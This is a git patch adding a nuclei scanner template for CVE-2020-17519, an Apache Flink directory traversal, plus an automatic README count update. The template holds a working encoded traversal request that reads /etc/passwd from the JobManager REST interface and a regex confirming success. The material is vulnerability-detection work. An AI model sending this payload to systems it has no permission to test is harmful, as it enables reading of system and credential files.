From dfd308612b2e665f32ca45466598fdf9a224b987 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 6 Jan 2021 12:38:41 +0530
Subject: [PATCH 1/2] adding CVE-2020-17519

---
 cves/2020/CVE-2020-17519.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cves/2020/CVE-2020-17519.yaml

diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml
new file mode 100644
index 0000000000..926d6f1974
--- /dev/null
+++ b/cves/2020/CVE-2020-17519.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-17519
+
+info:
+  name: Apache Flink directory traversal
+  author: pd-team
+  severity: high
+  description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
+
+  # Source: https://github.com/B1anda0/CVE-2020-17519
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body

From 4c8c34992a96c56ae80685b228800d2201dbb5fa Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Wed, 6 Jan 2021 07:09:19 +0000
Subject: [PATCH 2/2] Auto Update README [Wed Jan  6 07:09:19 UTC 2021] :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 0f6aa64a3f..71ce2450d4 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 145             | files                     | 48                     |
+| cves               | 146             | files                     | 48                     |
 | vulnerabilities    | 42    | panels                    | 49                    |
 | technologies       | 41       | security-misconfiguration | 28 |
 | workflows          | 17          | tokens                    | 8                    |
@@ -151,6 +151,7 @@ An overview of the nuclei template directory including number of templates and H
 │       ├── CVE-2020-16952.yaml
 │       ├── CVE-2020-17505.yaml
 │       ├── CVE-2020-17506.yaml
+│       ├── CVE-2020-17519.yaml
 │       ├── CVE-2020-2096.yaml
 │       ├── CVE-2020-2140.yaml
 │       ├── CVE-2020-23972.yaml
@@ -477,7 +478,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 418 files**.
+**24 directories, 419 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.